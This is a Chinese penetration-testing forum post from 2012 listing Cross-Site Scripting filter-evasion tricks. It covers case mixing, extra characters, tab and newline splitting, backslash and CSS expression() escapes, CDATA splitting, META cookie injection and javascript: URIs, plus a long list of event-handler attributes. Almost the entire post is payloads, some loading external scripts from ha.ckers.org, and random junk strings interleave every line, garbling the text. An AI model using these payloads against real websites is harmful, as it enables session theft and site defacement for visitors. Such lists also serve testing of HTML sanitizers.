中国网络渗透测试联盟
标题:
Cross Site Scripting(XSS)攻击手法介绍
[打印本页]
作者:
admin
时间:
2012-12-31 09:59
标题:
Cross Site Scripting(XSS)攻击手法介绍
1. 改变字符大小写
4 d4 d. k, O, ^. @+ L
8 w- g7 A t6 _5 J6 ~
4 G# B( {1 p7 N! C8 K! ]) U
' r1 D+ d& @' P, Q- N2 s7 N5 Q
<sCript>alert(‘d’)</scRipT>
. S8 p1 l9 S7 L. f L2 ]. |
* q4 X6 Y# z' t$ ]
2. 利用多加一些其它字符来规避Regular Expression的检查
; N9 O+ D; O4 @6 w
. [; U1 {* H% w7 x+ Y4 r4 j
<<script>alert(‘c’)//<</script>
, X1 |8 S9 ?- p
9 X0 Y2 b/ Y) p! I( W; Y6 s
<SCRIPT a=">" SRC="t.js"></SCRIPT>
3 S2 x3 ^& L5 T3 R) x% l' n
$ J) g T* r8 y
<SCRIPT =">" SRC="t.js"></SCRIPT>
6 Q; |( n- g4 D
6 h' _5 S: d2 ]
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>
; y+ m8 \' F8 \! z
" y9 K& @( Q. |$ _% Q- ?6 P' `7 b
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
" K# c% Y/ K; m0 o: o+ o
7 f0 F: m4 Q. _5 G. a! D' T
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
5 q# k- S/ b# h$ [
" \0 Z7 k2 i8 [! @* k) Z, r
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
# d! [0 ?" M9 L) ?* w; S* B h
. y% s, F- ^. f* \( ^
3. 以其它扩展名取代.js
# [6 t# O4 O$ w- T2 t7 d/ Q0 {6 [. ~
, _. s, x* x/ I% I
<script src="bad.jpg"></script>
7 S1 u' U/ C0 M' s. M
: k* P8 @# H& H2 m/ E, e x
4. 将Javascript写在CSS档里
3 k r$ [6 T8 s& v
1 G& f1 \0 z+ D# v. h
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
0 d- G0 V9 [8 M8 N& n' U* K1 }
! c$ B# h" q& {, G: M) S
example:
1 M) t9 f7 _! ^4 Q
0 t7 K$ U- |8 J2 u! h! }
body {
) I, D3 v- r9 Y+ g# D+ N" Y, P
2 d. E; S) Q$ [2 p. B
background-image: url(‘javascript:alert("XSS");’)
m3 p5 K; N) _: O$ W
7 r5 ^1 G" y/ L8 B
}
) p( w- s7 g2 f9 t' [, N
7 u1 G) E( X+ Y1 c, b- ~
5. 在script的tag里加入一些其它字符
U) c/ n: N( S
5 q4 t8 z" d2 @$ ?8 G
<SCRIPT/SRC="t.js"></SCRIPT>
' c6 z( |6 E3 T: z
9 [1 f8 a& T3 v3 I& @
<SCRIPT/anyword SRC="t.js"></SCRIPT>
& e1 a$ e# Y+ O+ ^. d9 C$ e
1 O. J- _# N$ f. ]% z; e. b- c
6. 使用tab或是new line来规避
; q d2 t6 L4 a1 q3 ]( p
+ ?& `0 k z- Y" ?# b
<img src="jav ascr ipt:alert(‘XSS3′)">
3 Y! U& _. V! D) D& h
5 D" z, G+ K# r& ?. e
<img src="jav ascr ipt:alert(‘XSS3′)">
" _$ e- F; {/ \8 A
$ r/ x) ]; b9 z1 C& ~1 b
<IMG SRC="jav ascript:alert(‘XSS’);">
, n0 A9 c5 R/ z9 [1 `3 y
, J9 O# d; [4 k. u$ X7 _# N
-> tag
0 }8 B7 J0 |/ K" {
6 w: Y. R f) w
-> new line
+ z4 u9 @& s$ [8 Y2 }+ I+ g
# L) b& c% y( h9 t# i7 O
7. 使用"\"来规避
2 y5 g' q$ f. {& t, m, @
; T0 E& Y+ b' s0 {2 M
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
* N2 y, }2 l! a3 D* m; _
- l0 N5 J" c4 k3 U; K
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
. H9 l+ v0 h; F- S- ]
9 a9 `8 H( _$ Q, q2 ^
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
4 V# }+ |' X M. ~6 u; o9 K5 s) [" W
3 I8 c8 K* T3 b: @
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
7 E& Y+ w; }% I
4 f# i$ x: E0 g, X: l8 [ D2 X
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
: q! @* h5 o: T; U$ w
/ d( `- [2 l2 Z
8. 使用Hex encode来规避(也可能会把";"拿掉)
3 ]3 Z3 ^: v' I* r' U! ~/ h* R
" A c$ \# B5 Y# n& c
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
5 D% f/ B% H6 Z" S" b
0 n2 R- q4 B8 s4 [+ D, C. Y( u
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
@+ z( j: [# ]
3 k- L& M2 A- Z4 y4 n( A j
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
; v* u) {8 }5 M, @9 r( R
& q8 c: ]- b5 Z2 l" C" K
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
4 i9 e i. h4 l- ^! `- E
& d' E- [! |+ Z: R8 T E3 N
9. script in HTML tag
3 p/ T" J9 B% `& Z2 c
% o. w9 g: A( k! D5 D# U
<body onload=」alert(‘onload’)」>
0 Q3 G' X' a# Q( i/ O( _
% t; a. j5 a& Z1 K8 V
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
: D6 u' o+ S' N' `* `
6 z+ D# ^2 ?0 E. d$ Y" T
10. 在swf里含有xss的code
d8 K; ?4 @- M1 e
# f8 u/ i5 Q. Z" i% k% R1 S7 H
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
% E) ?* f& G& c
0 I6 }3 n0 f) ?3 x1 ~" ^. A$ G
11. 利用CDATA将xss的code拆开,再组合起来。
4 x& _( f' b: q& v0 p5 S. {: v
0 H7 P& N9 ]5 K7 P1 J& |: e8 ~
<XML ID=I><X><C>
0 z$ [1 a# |6 H
0 I+ ^% P& c' A5 i% `) ~8 q
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
5 A g! r# Z4 j; b+ }! Q
A1 L. z8 L) T7 D& p) Y# H' q
</C></X>
5 Z, d2 k, ~# l4 o
3 Y7 f! a. \, L/ ]6 @6 j+ \* O
</xml>
9 E* o1 c% M4 `6 L: x
" X" t6 q+ v3 w
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
! Q) ? L3 F$ v8 G- S: v( j
* S. b5 T _0 Z# o' K3 o7 \; ]
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
9 @2 T! ]; O0 x- E' ?, N/ _' V% ? L( T1 [
8 D8 ^5 _& m7 J4 [
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
# V) x" n4 U* J' V
) }6 Q5 b5 l. X6 G: ~, v
12. 利用HTML+TIME。
. v0 ?3 w/ f# |2 M; u2 k2 S: l
1 v* S, c4 W J4 }7 v
<HTML><BODY>
6 [2 V" T: q+ p& A6 Q
* X U. t ] L$ z- p
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
2 |8 b/ X" U9 i# p6 k
) h8 Q4 j- G- [6 d
<?import namespace="t" implementation="#default#time2">
) O+ U2 B* V p- v" P, ]
& S# O" X% f* W- o- j* p
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
( G: H4 V$ q* c( m
$ {$ m& T- @* Z, l1 Z1 m
</BODY></HTML>
) u/ d# S3 A( X# u
9 K; Z5 Q7 y, `) `1 T
13. 透过META写入Cookie。
9 x, ]& A e1 m3 ^5 R0 B, Q
- y+ V: T1 _* Q# r$ S/ b. G" \
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
2 j. C0 P/ ?2 z/ x* |8 B
: }$ P+ I/ A; c7 ^
14. javascript in src , href , url
0 p5 M7 H( s7 s$ X* f, ]) H1 R; A
, n- R1 O0 e3 s
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
/ Y1 L" Z6 M6 D( z4 y+ ~
6 g/ ^0 Y+ |3 B# \( A
<img src="javascript:alert(‘XSS3′)">
/ D) [3 Z9 a8 {. X7 Y8 Y* a. k
; Y2 |: c4 `: q7 F" t8 n/ T+ c
<IMG DYNSRC="javascript:alert(‘XSS20′)">
6 e# Y* z+ m' |6 N* j
) v6 u% t$ j2 N- c' c3 F9 V5 ?7 q
<IMG LOWSRC="javascript:alert(‘XSS21′)">
L0 y$ M( W/ W
5 P9 u2 l; v9 a+ U) \7 F
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
2 j. ] X0 v" }, e' ^
/ Y: s3 ?) J2 y$ g
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
5 r' _6 J' v3 C0 n$ G; c8 m: P g, m
/ W/ V+ d- N# e( c( M& Z
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
5 t- W" p5 A6 b/ X
+ F; ]( S9 t' y1 Z
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
" H5 P7 V; D. z8 u9 Y
+ I5 B6 T6 a2 }1 u V) s+ Q9 p0 K8 w
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
1 w8 p0 Y8 A+ V4 q4 ?' ^
$ J4 u% r3 w; x
</STYLE><A CLASS=XSS></A>
- D' _4 _8 m8 C; I- X7 m% C5 q
+ E) R( K6 A* P) Q+ o
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
: J3 n5 j( h% k3 R2 n8 p4 A
4 W3 e9 \& K7 T/ k
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2